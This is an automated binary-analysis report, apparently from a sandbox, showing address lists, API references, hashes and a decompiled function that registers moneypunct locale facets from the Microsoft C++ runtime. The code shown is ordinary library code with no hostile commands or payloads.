0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797

APIs

__EH_prolog3.LIBCMT ref: 6D48F760
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F76A
int.LIBCPMT ref: 6D48F781

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D48F7A4
std::_Facet_Register.LIBCPMT ref: 6D48F7BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F7DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F7F9

Strings

xmTm, xrefs: 6D48F775

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: xmTm
API String ID: 113178234-571771561
Opcode ID: 723be85203ae7b2f892084fae89cc5c637fa9187775a39918d531229153e8307
Instruction ID: 0c804fb18dc05350519083b91c182b2725b0bb236b78fded338bd736d0a4dcad
Opcode Fuzzy Hash: 723be85203ae7b2f892084fae89cc5c637fa9187775a39918d531229153e8307
Instruction Fuzzy Hash: F611BC758082199BDF01EBA0C844EEDB7B4AF90314F2A400DD611AB395CB74DD00CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t462 - 0x14, 0);
				_t441 =  *0x6d546dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6D46161C(0x6d546d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6D4866BA(_t462 - 0x14);
					return E6D4A0075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6D491230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t462 - 0x20);
							E6D4A3D74(_t462 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t430, _t441, 0x14);
							E6D486653(_t462 - 0x14, 0);
							_t442 =  *0x6d546dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6D46161C(0x6d546d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6D4866BA(_t462 - 0x14);
								return E6D4A0075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6D4912B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t462 - 0x20);
										E6D4A3D74(_t462 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t327, _t431, _t442, 0x14);
										E6D486653(_t462 - 0x14, 0);
										_t443 =  *0x6d546dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6D46161C(0x6d546d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6D4866BA(_t462 - 0x14);
											return E6D4A0075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6D491339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t462 - 0x20);
													E6D4A3D74(_t462 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t327, _t432, _t443, 0x14);
													E6D486653(_t462 - 0x14, 0);
													_t444 =  *0x6d546db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6D46161C(0x6d546d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6D4866BA(_t462 - 0x14);
														return E6D4A0075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6D4913A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t462 - 0x20);
																E6D4A3D74(_t462 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t327, _t433, _t444, 0x14);
																E6D486653(_t462 - 0x14, 0);
																_t445 =  *0x6d546ddc; // 0x0
																 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																 *(_t462 - 0x10) = _t445;
																_t205 = E6D46161C(0x6d546d88);
																_t358 =  *((intOrPtr*)(_t462 + 8));
																_t434 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t205);
																__eflags = _t434;
																if(_t434 != 0) {
																	L33:
																	E6D4866BA(_t462 - 0x14);
																	return E6D4A0075(_t434);
																} else {
																	__eflags = _t445;
																	if(_t445 == 0) {
																		_push( *((intOrPtr*)(_t462 + 8)));
																		_push(_t462 - 0x10);
																		__eflags = E6D491409(_t327, _t358, _t428, _t434, _t445) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t462 - 0x20);
																			E6D4A3D74(_t462 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t327, _t434, _t445, 0x14);
																			E6D486653(_t462 - 0x14, 0);
																			_t446 =  *0x6d546de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6D46161C(0x6d546d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6D4866BA(_t462 - 0x14);
																				return E6D4A0075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6D491471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t462 - 0x20);
																						E6D4A3D74(_t462 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t327, _t435, _t446, 0x14);
																						E6D486653(_t462 - 0x14, 0);
																						_t447 =  *0x6d546dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6D46161C(0x6d546da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6D4866BA(_t462 - 0x14);
																							return E6D4A0075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6D4914EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t462 - 0x20);
																									E6D4A3D74(_t462 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t327, _t436, _t447, 0x14);
																									E6D486653(_t462 - 0x14, 0);
																									_t448 =  *0x6d546dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6D46161C(0x6d546d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6D4866BA(_t462 - 0x14);
																										return E6D4A0075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6D491558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t462 - 0x20);
																												E6D4A3D74(_t462 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t327, _t437, _t448, 0x14);
																												E6D486653(_t462 - 0x14, 0);
																												_t449 =  *0x6d546e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6D46161C(0x6d546dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6D4866BA(_t462 - 0x14);
																													return E6D4A0075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6D4915C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t462 - 0x20);
																															E6D4A3D74(_t462 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t327, _t438, _t449, 0x14);
																															E6D486653(_t462 - 0x14, 0);
																															_t450 =  *0x6d546dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6D46161C(0x6d546d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6D46171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6D4866BA(_t462 - 0x14);
																																return E6D4A0075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6D49162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6D461438(_t397);
																																		E6D4A3D74(_t462 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6d4ec0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6D49542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6D4A0075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6D486FD3(__eflags, _t439);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6d546dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6D486FD3(__eflags, _t438);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6d546e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6D486FD3(__eflags, _t437);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6d546dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6D486FD3(__eflags, _t436);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6d546dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6D486FD3(__eflags, _t435);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6d546de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6D486FD3(__eflags, _t434);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6d546ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6D486FD3(__eflags, _t433);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6d546db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6D486FD3(__eflags, _t432);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6d546dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6D486FD3(__eflags, _t431);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6d546dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6D486FD3(__eflags, _t430);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6d546dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}

0x6d48f6b3
0x6d48f6b3
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e4
0x6d48f6e9
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1

APIs

__EH_prolog3.LIBCMT ref: 6D48F6BA
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F6C4
int.LIBCPMT ref: 6D48F6DB

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

moneypunct.LIBCPMT ref: 6D48F6FE
std::_Facet_Register.LIBCPMT ref: 6D48F715
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F735
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F753

Strings

|mTm, xrefs: 6D48F6CF

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: |mTm
API String ID: 113178234-2910199294
